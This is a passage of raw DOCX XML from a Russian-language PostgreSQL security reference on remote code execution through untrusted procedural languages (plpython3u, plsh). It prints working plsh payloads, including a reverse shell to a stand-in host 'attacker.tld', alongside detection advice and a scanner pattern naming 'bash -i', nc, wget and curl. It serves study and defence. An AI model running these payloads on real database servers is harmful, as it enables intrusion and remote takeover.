        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$sh$;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_temp.s();</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(то же самое):</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pg_temp.s() RETURNS text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plsh AS $sh$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$sh$;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_temp.s();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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записывает тело во временный файл, делает chmod +x, выполняет через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Возвращаемое значение — stdout последней команды.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse-shell:</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pg_temp.s() RETURNS void</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plsh AS $sh$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i &gt;&amp; /dev/tcp/attacker.tld/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$sh$;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_temp.s();</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Произвольный Python или shell-код выполняется в адресном пространстве backend-процесса PostgreSQL под OS-пользователем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Возможности идентичны 3.7.2a (plperlu): доступ к файловой системе, сетевые соединения, env, fork(). После RCE — стандартный набор post-exploitation (см. 3.7.1 и 3.7.2a).</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plpython3u и plsh — namensgebung-untrusted: суффикс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или язык </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> означает «без sandbox по умолчанию». PostgreSQL делегирует contention выбор Python-/shell-runtime, не пытаясь ограничивать API. CREATE FUNCTION требует superuser именно из-за этого — security-граница на уровне привилегий, не на уровне runtime.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trusted-вариант </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plpythonu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> существовал в старых версиях PostgreSQL (до 9.x), использовал Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">restricted execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — этот механизм был признан небезопасным и удалён из Python 2 в 2003 г. С появлением Python 3 trusted-вариант не возрождали; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plpython3u — единственный доступный PL/Python вариант с PG 11+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и он untrusted.</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plpython3u в стандартной поставке с PG 11+ (раньше был plpythonu — deprecated). plsh — отдельный пакет, доступен для всех current PG-версий.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только superuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> может CREATE EXTENSION plpython3u / plsh и CREATE FUNCTION в этих языках.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EXTENSION plpython3u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (в contrib, идёт со стандартной поставкой PostgreSQL)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EXTENSION plsh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (отдельный пакет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgresql-XX-plsh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в Debian/Ubuntu; github.com/petere/plsh; нужно отдельно установить на сервер)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OS-зависимости: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plpython3u — Python 3 runtime + postgresql-plpython3 пакет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plsh — bash (стандартный во всех Linux-сборках)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нет специальных требований.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plr / plv8:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> plr — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION plr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, отдельный пакет postgresql-plr, нужен R-runtime. plv8 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION plv8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, отдельный пакет postgresql-plv8, нужен V8-engine.</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plpython3u встречается в production-кодах для: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ML-инференса прямо из БД (например, scoring-функция, использующая pickle-модель)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сложного text/JSON processing с использованием Python-библиотек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web-scraping triggers (редко, обычно в anti-pattern)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plsh встречается крайне редко — в основном для admin-хелперов вызова внешних утилит из триггера.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Признаки атаки в логах:</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'ddl'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FUNCTION ... LANGUAGE plpython3u</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LANGUAGE plsh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не-DBA сессии</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Чёткий маркер.</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ddl_command_end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: фильтр по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prolang IN ('plpython3u', 'plsh', 'plperlu', 'plr')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — алерт на любое CREATE FUNCTION в untrusted-языках от не-whitelist-роли.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pg_proc.prosrc</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статический сканер на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import os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import subprocess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os.system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subprocess.run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в plpython3u; на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i</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nc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wget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curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в plsh.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Те же OS-сигналы, что в 3.7.1 / 3.7.2a: аномальный исходящий трафик, audited execve от postgres-UID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Версии.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Расширение</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Версия PG</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Поведение</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plpython3u</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стабильное, untrusted by design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plpythonu (Python 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до PG 11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deprecated, удалён из contrib в PG 11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plsh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current PG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стабильное (внешний пакет)</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current PG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стабильное (внешний пакет, untrusted)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plv8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current PG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стабильное (внешний пакет, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">trusted</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — для атак сложнее)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — альтернатива, требует pg_execute_server_program (более доступно), не требует CREATE EXTENSION.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3.7.2a plperlu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — другой untrusted-язык с теми же требованиями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3.7.2b CVE-2024-10979</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — единственный путь без superuser (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">trusted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> plperl).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — пути получения superuser. Без него все три untrusted-extension недоступны.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стакинг для протаскивания CREATE FUNCTION + SELECT в одной инъекции.</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«PL/Python — Python Procedural Language» — https://www.postgresql.org/docs/current/plpython.html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«PL/Python — Sharing Data» (untrusted nature) — https://www.postgresql.org/docs/current/plpython-sharing.html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plsh GitHub: github.com/petere/plsh — https://github.com/petere/plsh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plr GitHub: github.com/postgres-plr/plr — https://github.com/postgres-plr/plr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plv8 GitHub: github.com/plv8/plv8 — https://github.com/plv8/plv8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HackTricks: «PostgreSQL injection» (раздел RCE через extension languages) — https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection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Rapid7 Metasploit: модули для plpython3u RCE — https://www.rapid7.com/db/?q=postgres+python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R7 (sources/research.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари категории 3.7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В категории 3.7 разобраны четыре пути к Remote Code Execution в PostgreSQL: серверная фича </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY FROM/TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, две формы untrusted procedural languages (plperlu, plpython3u/plsh), и одиночный CVE в trusted plperl. Главный тезис: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
